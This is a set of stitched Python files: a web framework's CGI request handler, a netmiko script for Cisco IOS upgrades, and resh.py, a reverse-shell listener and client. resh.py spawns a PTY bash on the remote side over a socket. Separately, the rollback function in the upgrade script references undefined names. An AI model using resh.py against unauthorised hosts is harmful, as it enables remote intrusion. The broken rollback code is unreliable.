def _handle_matched_redirect(
self, pattern, patterns, target, external
):
# #
'''Performs an internal or external redirect.'''
if external:
if not __test_mode__:
self.external_uri = pattern.sub(target, self.external_uri)
self.send_response(301).send_header(
'Location', self.external_uri)
self.end_headers()
else:
target_match = patterns.match(target)
if target_match.group('type') != '-':
self.type = target_match.group('type')
for request in target_match.group('uri').split('#'):
self.uri = pattern.sub(
request, self.external_uri
).format(host_name=regularExpression.compile(':[0-9]+$').sub(
'', self.host))
if FileHandler(location=self.uri):
break
return self
@JointPoint
# # python3.5
# # def _set_dynamic_or_static_get(
# # self: Self, file_name: builtins.str
# # ) -> Self:
def _set_dynamic_or_static_get(self, file_name):
# #
'''
Makes a dynamic or static respond depending on incoming request.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('test: hans'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('test', 'hans')
>>> # #
>>> handler.load_module = True
>>> handler._set_dynamic_or_static_get('test') # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
'''
self.requested_file_name = file_name
if self._is_dynamic():
return self._dynamic_get()
return self._static_get()
@JointPoint
# # python3.5 def _default_get(self: Self) -> builtins.bool:
def _default_get(self):
'''
Handles every request which doesn't takes a file or python module \
with.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('cookie: hans'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('cookie', 'hans')
>>> # #
>>> handler.requested_file = FileHandler(
... __test_folder__.path + 'index.py')
>>> handler.requested_file.content = ''
>>> handler._default_get()
True
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('cookie: hans=peter'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('cookie', 'hans=peter')
>>> # #
>>> handler.requested_file = FileHandler(
... __test_folder__.path + 'index.py')
>>> handler.requested_file.content = ''
>>> handler._default_get()
True
>>> handler.server.web.directory_listing = False
>>> handler.requested_file.remove_file()
True
>>> handler._default_get()
False
>>> handler.server.web.module_loading = True
>>> handler.server.web.default = 'doctest'
>>> handler._default_get()
True
>>> handler.server.web.default = ''
>>> handler.server.web.default_module_names = 'doctest',
>>> handler.data['__no_respond__'] = True
>>> handler.respond = False
>>> handler._default_get()
True
'''
if self.server.web.default:
self._handle_given_default_get()
return True
if(self.server.web.module_loading and
self._is_default_module_requested()):
return True
for pattern in self.server.web.default_file_name_pattern:
# # python3.5
# # for file in builtins.filter(
# # lambda file: regularExpression.compile(
# # '(?:%s)$' % pattern
# # ).fullmatch(file.name), self.server.web.root.list()
# # ):
for file in builtins.filter(
lambda file: regularExpression.compile(
'(?:%s)$' % pattern
).match(file.name), self.server.web.root.list()
):
# #
self.requested_file = file
self._set_dynamic_or_static_get(file_name=file.name)
return True
if self.server.web.directory_listing:
self._static_get()
return True
return False
@JointPoint
# # python3.5
# # def _is_default_module_requested(self: Self) -> builtins.bool:
def _is_default_module_requested(self):
# #
'''
Handle a default module request if possible.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('test: hans'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('test', 'hans')
>>> # #
>>> handler._is_default_module_requested()
False
>>> handler.server.web = Web(
... __test_folder__, module_loading='doctest')
>>> handler._is_default_module_requested()
True
'''
if self.server.web.module_loading:
# # python3.5
# # if builtins.isinstance(
# # self.server.web.module_loading, builtins.str
# # ) and self._handle_default_modules_get(
# # self.server.web.module_loading
# # ):
if builtins.isinstance(
self.server.web.module_loading, builtins.unicode
) and self._handle_default_modules_get(
self.server.web.module_loading
):
# #
return True
for module_name in self.server.web.default_module_names:
if self._handle_default_modules_get(module_name):
return True
return False
@JointPoint
# # python3.5
# # def _handle_default_modules_get(
# # self: Self, module_name: builtins.str
# # ) -> (Self, builtins.bool):
def _handle_default_modules_get(self, module_name):
# #
'''
Handles requests which wants the current defaults modules \
(initially called module) run for a server thread.
Examples:
>>> test_globals_backup = __test_globals__['__name__']
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('test: hans'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('test', 'hans')
>>> # #
>>> handler._handle_default_modules_get('not_existing')
False
>>> handler._handle_default_modules_get('__main__')
False
>>> __test_globals__['__name__'] = __module_name__
>>> handler._handle_default_modules_get(
... '__main__'
... ) # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and param...
>>> __test_globals__['__name__'] = test_globals_backup
'''
if module_name == '__main__':
if __name__ != '__main__':
self.load_module = True
return self._set_dynamic_or_static_get(file_name=module_name)
elif Module.get_file_path(context_path=module_name):
self.load_module = True
return self._set_dynamic_or_static_get(file_name=module_name)
return False
@JointPoint
# # python3.5 def _handle_given_default_get(self: Self) -> Self:
def _handle_given_default_get(self):
'''
Handles request with no explicit file or module to run.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> handler.path = '/'
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('cookie: hans'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('cookie', 'hans')
>>> # #
>>> __test_buffer__.clear() # doctest: +ELLIPSIS
'...'
>>> handler._handle_given_default_get() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> __test_buffer__.clear() # doctest: +ELLIPSIS
'...Determine "" as default file...'
>>> handler.server.web.module_loading = True
>>> handler.server.web.default = 'doctest'
>>> handler._handle_given_default_get() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> __test_buffer__.clear() # doctest: +ELLIPSIS
'...Determine "doctest" as default module...'
'''
if((self.server.web.module_loading is True or
self.server.web.module_loading == self.server.web.default) and
Module.get_file_path(context_path=self.server.web.default)):
self.load_module = True
__logger__.info(
'Determine "%s" as default module.', self.server.web.default)
self.requested_file = FileHandler(
location=self.server.web.root.path + self.server.web.default)
if self.requested_file:
__logger__.info(
'Determine "%s" as default file.', self.server.web.default)
return self._set_dynamic_or_static_get(
file_name=self.server.web.default)
@JointPoint
# # python3.5 def _static_get(self: Self) -> Self:
def _static_get(self):
'''
Handles a static file-request.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> handler.requested_file = FileHandler(
... __test_folder__.path + '_static_get')
>>> handler.requested_file.content = ''
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String(
... 'if-modified-since: %s' % handler.date_time_string(
... int(handler.requested_file.timestamp))
... ), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header(
... 'if-modified-since', handler.date_time_string(
... int(handler.requested_file.timestamp)))
>>> # #
>>> handler._static_get() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
'''
if not __test_mode__ and self.requested_file.is_directory():
if self.data_type == 'multipart/form-data':
self._save_uploaded_files()
'''
If a directory was requested and no trailing slash where \
given a 301 redirect will be returned to same request with \
trailing slash.
'''
if not regularExpression.compile(
'/(%s.*)?$' % self.server.web.request_parameter_delimiter
).search(self.external_uri):
self.send_response(301).send_header(
'Location', regularExpression.compile(
'((%s.*)?)$' %
self.server.web.request_parameter_delimiter
).sub('/\\1', self.external_uri))
return self.end_headers()
return self.list_directory()
try:
file_handler = builtins.open(self.requested_file._path, mode='rb')
except builtins.IOError:
self._send_no_file_error()
return self
# # python3.5
# # if(self.headers.get('if-modified-since') ==
# # self.date_time_string(
# # builtins.int(self.requested_file.timestamp))):
if(self.headers.get('if-modified-since') ==
self.date_time_string(
builtins.int(self.requested_file.timestamp))):
# #
return self._send_not_modified_header()
return self._send_static_file(output=file_handler)
@JointPoint
# # python3.5 def _save_uploaded_files(self: Self) -> Self:
def _save_uploaded_files(self):
'''
Uploaded data to a directory are saved automatically by this \
method.
'''
for items in self.data.values():
for item in items:
# # python3.5
# # if(builtins.len(item) == 4 and
# # 'content' in item and 'name' in item and
# # 'disposition' in item and 'disposition' in item and
# # 'encoding' in item):
# # FileHandler(
# # self.requested_file.path + item['name'],
# # encoding=item['encoding']
# # ).set_content(content=item['content'], mode='w+b')
if(builtins.len(item) == 3 and
'content' in item and 'name' in item and
'disposition' in item):
FileHandler(
self.requested_file.path + item['name']
).set_content(content=item['content'], mode='w+b')
# #
return self
@JointPoint
# # python3.5
# # def _send_static_file(
# # self: Self, output: (builtins.str, _io.BufferedReader)
# # ) -> Self:
def _send_static_file(self, output):
# #
'''
Sends given output to client.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> handler.requested_file = FileHandler(
... __test_folder__.path + '_static_get')
>>> handler.requested_file.content = ''
>>> handler.server.web.file_size_stream_threshold_in_byte = 0
>>> handler._send_static_file('') # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
'''
threshold = self.server.web.file_size_stream_threshold_in_byte
mime_type = self.requested_file.get_mime_type(web=True)
if(self.requested_file.size < threshold or
mime_type in self.server.web.known_big_web_mime_types):
# # python3.5
# # self.send_content_type_header(
# # mime_type=mime_type, encoding=builtins.isinstance(
# # output, builtins.str))
self.send_content_type_header(
mime_type=mime_type, encoding=builtins.isinstance(
output, builtins.unicode))
# #
else:
self.send_content_type_header(
mime_type='application/octet-stream', encoding=False)
if not __test_mode__:
self.send_header('Content-Transfer-Encoding', 'binary')
self.send_static_file_cache_header(
timestamp=self.requested_file.timestamp)
self.send_content_length_header(
size=builtins.int(self.requested_file.size))
self.end_headers()
return self._send_output(output)
@JointPoint
# # python3.5 def _send_not_modified_header(self: Self) -> Self:
def _send_not_modified_header(self):
'''Sends a header to client indicating cached file hasn't changed.'''
self.send_content_type_header(
mime_type=self.requested_file.mime_type, response_code=304
).send_static_file_cache_header(
timestamp=self.requested_file.timestamp
).send_content_length_header(
size=builtins.int(self.requested_file.size))
self.end_headers()
return self
@JointPoint
# # python3.5
# # def _send_output(
# # self: Self, output: (builtins.str, _io.BufferedReader)
# # ) -> Self:
def _send_output(self, output):
# #
'''Sends the final given output to client.'''
if not (
output is None or __test_mode__ or self.type == 'head'
):
if self._encoded_output:
self.wfile.write(self._encoded_output)
# # python3.5
# # elif builtins.isinstance(output, builtins.bytes):
elif builtins.isinstance(output, builtins.str):
# #
self.wfile.write(output)
# # python3.5 elif builtins.isinstance(output, builtins.str):
elif builtins.isinstance(output, builtins.unicode):
self.wfile.write(output.encode(self.server.web.encoding))
else:
self.copyfile(output, self.wfile)
output.close()
return self
@JointPoint
# # python3.5
# # def _gzip(
# # self: Self, content: (builtins.str, builtins.bytes)
# # ) -> builtins.bytes:
def _gzip(self, content):
# #
'''
Compresses the given content and returns the encoded result.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> isinstance(handler._gzip(''), bytes)
True
>>> isinstance(handler._gzip(bytes()), bytes)
True
'''
# # python3.5 output = io.BytesIO()
output = StringIO.StringIO()
gzip_file_handler = gzip.GzipFile(
fileobj=output, mode='w', compresslevel=5)
if builtins.isinstance(content, builtins.bytes):
gzip_file_handler.write(content)
else:
gzip_file_handler.write(content.encode(
encoding=self.server.web.encoding))
gzip_file_handler.close()
return output.getvalue()
@JointPoint
# # python3.5 def _dynamic_get(self: Self) -> Self:
def _dynamic_get(self):
'''
Handles a dynamic file or python module request. It initializes \
the given script-file or python module environment whether to \
decide running it in its own thread or not. If no respond is \
expected from client it could be run without its own thread \
environment.
'''
# # python3.5
# # self.request_arguments = (
# # ('header', builtins.str(self.headers)), ('type', self.type),
# # ('handler', self),
# # ('requestedFileName', self.requested_file_name),
# # ('host', self.host), ('uri', self.uri), ('get', self.get),
# # ('externalURI', self.external_uri), ('data', self.data),
# # ('cookie', self.cookie), ('externalType', self.external_type),
# # ('sharedData', self.server.web.shared_data))
self.request_arguments = (
('header', convert_to_unicode(self.headers)),
('type', self.type), ('handler', self),
('requestedFileName', self.requested_file_name),
('host', self.host), ('uri', self.uri), ('get', self.get),
('externalURI', self.external_uri), ('data', self.data),
('cookie', self.cookie), ('externalType', self.external_type),
('sharedData', self.server.web.shared_data))
# #
if '__no_respond__' not in self.data:
self.respond = True
return self._run_request()
self.__class__.last_running_worker = threading.Thread(
target=self._run_request)
self.__class__.last_running_worker.start()
return self
@JointPoint
# # python3.5 def _run_request(self: Self) -> Self:
def _run_request(self):
'''
Decides to run the given script as python-module or standalone \
script-file.
'''
if self.load_module:
return self._run_requested_module()
return self._run_requested_file()
@JointPoint
# # python3.5 def _run_requested_file(self: Self, debug=False) -> Self:
def _run_requested_file(self, debug=False):
'''
Runs a given external process in a subprocess. Output and errors \
are piped to requested client.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> handler.requested_file = FileHandler(
... __test_folder__.path + '_run_requested_file')
>>> handler.requested_file.content = ''
>>> handler.request_arguments = ('hans', 'peter'),
>>> handler.respond = False
>>> handler._run_requested_file() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> handler.request_arguments = ('hans', 'peter'),
>>> handler._run_requested_file(True) # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
'''
# # python3.5
# # self.request_arguments = builtins.list(builtins.map(
# # lambda element: builtins.str(
# # element[1]
# # ), self.request_arguments))
self.request_arguments = builtins.list(builtins.map(
lambda element: convert_to_unicode(element[1]),
self.request_arguments))
# #
self.request_arguments[0] = self.server.web.root.path + \
self.request_arguments[0][1]
__logger__.debug('Execute file "%s".', self.request_arguments[0])
self.server.web.number_of_running_threads += 1
try:
output, errors = subprocess.Popen(
self.request_arguments, stdout=subprocess.PIPE,
stderr=subprocess.PIPE
).communicate()
except builtins.OSError as exception:
output = ''
# # python3.5
# # errors = '%s: %s' % (
# # exception.__class__.__name__, builtins.str(exception))
errors = '%s: %s' % (
exception.__class__.__name__, convert_to_unicode(
exception))
# #
self.server.web.number_of_running_threads -= 1
size = builtins.len(output)
# # python3.5
# # if not builtins.isinstance(errors, builtins.str):
if not builtins.isinstance(errors, builtins.unicode):
# #
errors = errors.decode(
encoding=self.server.web.encoding, errors='strict')
if self.respond:
if errors:
program_description = ''
if(sys.flags.debug or __logger__.isEnabledFor(logging.DEBUG) or
debug):
program_description = ' "%s"' % self.request_arguments[0]
self.send_error(
500, 'Internal server error with cgi program%s: "%s"' % (
program_description,
regularExpression.compile('\n+').sub('\n', errors)))
else:
'''Check if given output contains a header.'''
header_match = regularExpression.compile(
'[A-Z0-9]+/([0-9]+\.)+[0-9]+ [0-9]{3} [a-zA-Z ]+\n'
'([^:]+: .+\n)+\n.+'
).match(output.decode(encoding=self.server.web.encoding))
if not header_match:
self.send_content_type_header().send_content_length_header(
size, dynamic_output=output
).end_headers()
self._send_output(output)
if errors:
__logger__.critical(
'Error in common gateway interface program "%s": %s',
self.request_arguments[0], errors)
return self
@JointPoint
# # python3.5 def _run_requested_module(self: Self) -> Self:
def _run_requested_module(self):
'''
Imports and runs a given python module. Errors and output are \
piped to requested client.
'''
self.request_arguments = builtins.dict(self.request_arguments)
'''Redirect output buffer.'''
print_default_buffer_backup = Print.default_buffer
Print.default_buffer = self.server.web.thread_buffer
# # python3.5 sys_path_backup = sys.path.copy()
sys_path_backup = copy(sys.path)
sys.path = [self.server.web.root.path] + sys.path
self.server.web.number_of_running_threads += 1
requested_module = builtins.__import__(
self.request_arguments['requestedFileName'])
'''Extend requested scope with request dependent globals.'''
requested_module.__request_arguments__ = self.request_arguments
sys.path = sys_path_backup
__logger__.debug('Run module "%s".', requested_module)
return self._handle_module_running(
requested_module, print_default_buffer_backup, sys_path_backup)
@JointPoint
# # python3.5
# # def _handle_module_running(
# # self: Self, requested_module: ModuleType,
# # print_default_buffer_backup: builtins.object,
# # sys_path_backup: NativeIterable
# # ) -> Self:
def _handle_module_running(
self, requested_module, print_default_buffer_backup,
sys_path_backup
):
# #
'''Handles exceptions raising in requested modules.'''
try:
if not __test_mode__:
Module.determine_caller(
callable_objects=Module.get_defined_callables(
object=requested_module)
)[1]()
except builtins.BaseException as exception:
self._handle_module_exception(requested_module, exception)
else:
if self.respond:
self.send_content_type_header().send_content_length_header(
size=builtins.len(self.server.web.thread_buffer.content),
dynamic_output=self.server.web.thread_buffer.content
).end_headers()
finally:
self.server.web.number_of_running_threads -= 1
if self.respond:
self._send_output(
output=self.server.web.thread_buffer.clear())
Print.default_buffer = print_default_buffer_backup
return self
@JointPoint
# # python3.5
# # def _handle_module_exception(
# # self: Self, requested_module: ModuleType,
# # exception: builtins.BaseException, debug=False
# # ) -> Self:
def _handle_module_exception(
self, requested_module, exception, debug=False
):
# #
'''
This method handles each exception raised by running a module \
which was requested by client.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> try:
... raise OSError('hans')
... except OSError as exception:
... handler._handle_module_exception(
... __import__('doctest'), exception, True)
Traceback (most recent call last):
...
OSError: hans
>>> handler.respond = True
>>> try:
... raise OSError('hans')
... except BaseException as exception:
... handler._handle_module_exception(
... __import__('doctest'), exception, True)
Traceback (most recent call last):
...
OSError: hans
>>> __test_buffer__.clear() # doctest: +ELLIPSIS
'...'
>>> try:
... raise OSError('hans')
... except BaseException as exception:
... handler._handle_module_exception(
... __import__('doctest'), exception
... ) # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> __test_buffer__.clear() # doctest: +ELLIPSIS
'... - ...CRITICAL... - Error in module "doctest" OSError: hans...'
'''
if self.respond:
if(sys.flags.debug or __logger__.isEnabledFor(logging.DEBUG) or
debug):
# # python3.5
# # self.send_error(
# # 500, '%s: %s\n\nRequest informations:\n\n%s' % (
# # exception.__class__.__name__,
# # regularExpression.compile('\n+').sub(
# # '\n', builtins.str(exception)
# # ), json.dumps(
# # self.request_arguments, skipkeys=True,
# # ensure_ascii=False, check_circular=True,
# # allow_nan=True, indent=4,
# # separators=(',', ': '), sort_keys=True,
# # default=lambda object: '__not_serializable__'))
# # )
self.send_error(
500, '%s: %s\n\nRequest informations:\n\n%s' % (
exception.__class__.__name__,
regularExpression.compile('\n+').sub(
'\n', convert_to_unicode(exception)
), json.dumps(
self.request_arguments, skipkeys=True,
ensure_ascii=False, check_circular=True,
allow_nan=True, indent=4,
separators=(',', ': '), sort_keys=True,
default=lambda object: '__not_serializable__')))
# #
else:
self.send_error(500, 'Internal server error')
if sys.flags.debug or __logger__.isEnabledFor(logging.DEBUG) or debug:
raise
else:
# # python3.5
# # __logger__.critical(
# # 'Error in module "%s" %s: %s\n\nRequest informations:\n\n'
# # '%s', requested_module.__name__,
# # exception.__class__.__name__, builtins.str(exception),
# # json.dumps(
# # self.request_arguments, skipkeys=True,
# # ensure_ascii=False, check_circular=True,
# # allow_nan=True, indent=4, separators=(',', ': '),
# # sort_keys=True,
# # default=lambda object: '__not_serializable__'))
# TODO do it on every error handler and in html response.
__logger__.critical(
'Error in module "%s" %s: %s\n\nRequest informations:\n\n'
'%s', requested_module.__name__,
exception.__class__.__name__, convert_to_unicode(
exception
), json.dumps(
self.request_arguments, skipkeys=True,
ensure_ascii=False, check_circular=True,
allow_nan=True, indent=4, separators=(',', ': '),
sort_keys=True,
default=lambda object: '__not_serializable__'))
# #
return self
# # endregion
# endregion
# endregion
# region footer
'''
Preset some variables given by introspection letting the linter know what \
globale variables are available.
'''
__logger__ = __exception__ = __module_name__ = __file_path__ = \
__test_mode__ = __test_buffer__ = __test_folder__ = __test_globals__ = None
'''
Extends this module with some magic environment variables to provide \
better introspection support. A generic command line interface for some \
code preprocessing tools is provided by default.
'''
Module.default(
name=__name__, frame=inspect.currentframe(), default_caller=Web.__name__)
# endregion
# region vim modline
# vim: set tabstop=4 shiftwidth=4 expandtab:
# vim: foldmethod=marker foldmarker=region,endregion:
# endregion
|
actions.py
|
import netmiko
from getpass import getpass
from netmiko import file_transfer
from netmiko.ssh_exception import NetMikoTimeoutException
from netmiko.ssh_exception import NetMikoAuthenticationException
from netmiko import SCPConn
import string
from threading import Thread
import pathlib
from common import common
from threading import Thread
directory = pathlib.Path(__file__).parent.absolute()
mute = 'python3 /opt/nsgbin/nsg.py mute store_'
unmute = 'python3 /opt/nsgbin/nsg.py unmute store_'
def list_model(creds, nodes):
'''
Lists models of the device or at a particular site.
@args:
- creds: username and password
- nodes: a list of devices
'''
try:
print('Hostname \t Model')
connection, cisco = common.find_type(nodes)
node = connection['ip']
if connection:
ssh_session = netmiko.ConnectHandler(**connection)
model = common.get_interface_by_model(ssh_session, cisco = cisco)
print(f'{node} \t {model}')
ssh_session.disconnect()
except Exception as e:
common.log(f'{node} - exception in list_model: {e}')
print(f'{node} - exception in list_model : {e}')
def upload(creds, nodes, config, running_configs):
'''
Uploads IOS file(s) to the device or a particular site.
@args:
- creds: username and password
- nodes: a list of devices
- config: file with devices' models and images
'''
try:
# print(f'Nodes i get {nodes}')
for node in nodes :
connection, cisco = common.find_type(node, creds)
##SAVE RUNING CONFIG
print(f'node is : {node}')
run_file = connection['ip'] + "-running-config.txt"
print(f'\nSaving running config into file: {running_configs}/{run_file} \n')
common.archive_run(connection, f'{running_configs}/{run_file}')
common.log(f'{node} - Saving running config into file: {running_configs}/{run_file}')
session = netmiko.ConnectHandler(**connection)
if cisco == False:
model = common.get_interface_by_model(session, cisco = cisco)
else:
model = common.get_interface_by_model(session, cisco = cisco)
threads = []
print(f'node just before the if condition {node}')
if node != None:
# print('the if Condition is failing')
# ssh_session = netmiko.ConnectHandler(**connection)
print(f'config under the upload {model}')
if model in config:
th = Thread(target = common.upload_ios_file, args = (connection, config, model))
threads.append(th)
else:
common.log(f'{node} - Please add {model} model to config.json ')
print(f'{node} - Please add {model} model to config.json')
for th in threads:
th.start()
for th in threads:
th.join()
except Exception as e:
common.log(f'{node} - exception : {e}')
print(f'{node} - exception in upload under actions : {e}')
def upgrade_ios(creds, nodes, config):
'''
upgrade_ios IOS file(s) to the device or a particular site.
@args:
- creds: username and password
- nodes: a list of devices
- config: file with devices' models and images
'''
try:
print(nodes)
for node in nodes:
connection, cisco = common.find_type(node, creds)
# node = connection['ip']
# print(connection)
session = netmiko.ConnectHandler(**connection)
model = common.get_interface_by_model(session, cisco = cisco)
image = config[model]['image']
md5 = config[model]['md5']
# print(md5)
# is_device_up = common.waiting_for_device(node, creds)
common.log(f'{node} - is upgrading to IOS : {image}')
print(f'{node} - is upgrading to IOS : {image}')
verify_md5 = common.verify_md5(session, image, md5, node)
if verify_md5 == True:
##TODO: umcomment when ready to boot
common.log(f'{node} - md5 validated Successfull..!')
print(f'{node} - md5 validated Successfull..!')
boot = input(f"\n{node} - proceed with changing boot ? (y/n): ")
common.log(boot)
# response = subprocess.check_output([f"{mute}, f'{node}'])
# print(response)
if boot == 'y':
common.set_boot(session, image, node)
if 'cs' in node:
bootvar = session.send_command('show boot')
else:
bootvar = session.send_command('show bootvar')
# print(bootvar)
print(f'{node} - Preforming pre checks ')
common.pre_post_reload_check(node, creds)
common.log(f'\n{node} - {bootvar}')
accept_reload = input("\n\nSuccess! - proceed with reload ? (y/n): ")
common.log(f'\n{node} - {accept_reload}')
if accept_reload == 'y':
try:
##TODO: umcomment when ready to reload
print('Im reloading now\n ')
common.reload(session, node)
# is_device_up = common.waiting_for_device(node, creds)
# sleep(10)
common.waiting_for_device(node, creds)
print('reloading completed')
except Exception as e:
common.log(f'{node} - unable to reload {e} ...')
print(f'{node} - unable to reload {e} ... ')
else:
common.log(f'{node} - Aborting reload')
print(f'\n{node} - Aborting reload !!!\n\n')
else:
common.log(f'{node} - Error veryfiing md5 checksum on device, quitting !!!')
print(f'\n\n{node} - Error veryfiing md5 checksum on device, quitting !!!\n\n')
session.disconnect()
except Exception as e:
common.log(f'{node} - upgrade_ios() Error -> {str(e)}')
print(f'{node} - exception in upgrade_ios : {e}')
def rollback(creds, nodes): #, img, hostname):
'''
Rollbacks to old image version on the device.
@args:
- img: old image from the config files we save.
- hostname: hostname.
'''
# print(f'old images under rollback {img}')
try:
for node in nodes:
connection, cisco = common.find_type(node, creds)
session = netmiko.ConnectHandler(**connection)
model = common.get_interface_by_model(session, cisco = cisco)
# image = config[model]['image']
print(f'Hostname i have {node}')
image = config[model]['image']
regex = image.split('-')[0]
lines = session.send_command(f'dir | inc {regex}').split('\n')
for line in lines:
## retrieving old image
if image not in line:
img = re.findall(r'' + regex + '.*', line)[0]
print(f'Rollback to {img} for {hostname}')
##TODO: umcomment when ready to
set_boot(session, img, hostname)
if 'cs' in node:
bootvar = session.send_command('show boot')
else:
bootvar = session.send_command('show bootvar')
print(bootvar)
reload_3 = input("\n\nSuccess! - proceed with reload ? (y/n) ... ")
if reload_3 == 'y':
try:
##TODO: umcomment when ready to reload
# reload(session)
print("Reloading ... ")
except:
print("NOT Reloading ... ")
# with open(f"/home/few7/device-ios-upgrade/run_conf/{node}-running-config.txt") as fo:
# for line in fo:
# # print(f'Im inside the while {line}')
# if img in line:
# ##UNCOMMENT ONES READY
# common.set_boot(session ,img, hostname)
# common.reload(session)
# ##COMMENT OUT LATER
# print(f' The line which has the image :{img} is {line}')
except Exception as e:
common.log(f'{node} - rollback() Error -> {str(e)}')
print(f'{node} - Exception in rollback {e}')
|
resh.py
|
#!/usr/bin/python3
import os
import socket
import sys
import termios
import threading
import tty
import time
def setTTY():
fd = sys.stdin.fileno()
oldSet = termios.tcgetattr(fd)
# os.system('stty raw -echo')
tty.setraw(0)
return fd, oldSet
def resetTTY(fd, oldSet):
termios.tcsetattr(fd, termios.TCSADRAIN, oldSet)
def recvLoop(sock):
while True:
try:
data = sock.recv(10000000)
except OSError:
break
except Exception as e:
print(e)
if data == b'' or data == None:
break
data = data.decode(errors='ignore')
cprint(data)
sock.close()
def cprint(data):
print(data, end='', flush=True)
def connect(host, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
return sock
def bind(port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('', port))
sock.listen(1)
client, addr = sock.accept()
print('{} <= {}'.format(client.getsockname()[0], addr[0]))
return sock, client
def rc(sock):
rc_path = os.path.expanduser('~') + '/.reshrc'
if os.path.exists(rc_path):
with open(rc_path, 'rb') as fd:
sock.send(fd.read())
def generateCmdRow():
size = os.get_terminal_size()
return 'stty rows {} columns {}\n'.format(size.lines, size.columns).encode()
def choice():
cprint('\r\n')
cprint('(1) Exit\r\n')
cprint('(2) Resize Terminal\r\n')
cprint('(3) Reload Reshrc\r\n')
cprint('(4) Get IP\r\n')
cprint('> ')
chc = sys.stdin.read(1)
if chc == '1':
sock.send(b'exit\n')
elif chc == '2':
sock.send(generateCmdRow())
elif chc == '3':
rc(sock)
sock.send(b'\n')
elif chc == '4':
print(sock.getsockname()[0], end='\r\n')
sock.send(b'\n')
else:
sock.send(b'\n')
return chc
print('''
██████╗░███████╗░██████╗██╗░░██╗
██╔══██╗██╔════╝██╔════╝██║░░██║
██████╔╝█████╗░░╚█████╗░███████║
██╔══██╗██╔══╝░░░╚═══██╗██╔══██║
██║░░██║███████╗██████╔╝██║░░██║
╚═╝░░╚═╝╚══════╝╚═════╝░╚═╝░░╚═╝
''')
if len(sys.argv) == 2:
serv, sock = bind(int(sys.argv[1]))
elif len(sys.argv) == 3:
sock = connect(sys.argv[1], int(sys.argv[2]))
else:
print('''Usage:
Client: resh [IP] [PORT]
Server: resh [PORT]''')
exit(1)
sock.send(b'export TERM=xterm\n')
sock.send(b'python3 -c \'import pty;pty.spawn("/bin/bash")\'\n')
cprint('\r\n')
fd, oldSet = setTTY()
thr = threading.Thread(target=recvLoop, args=(sock,))
thr.start()
time.sleep(1)
sock.send(generateCmdRow())
rc(sock)
while True:
c = sys.stdin.read(1)
if c == '\r':
c = '\n'
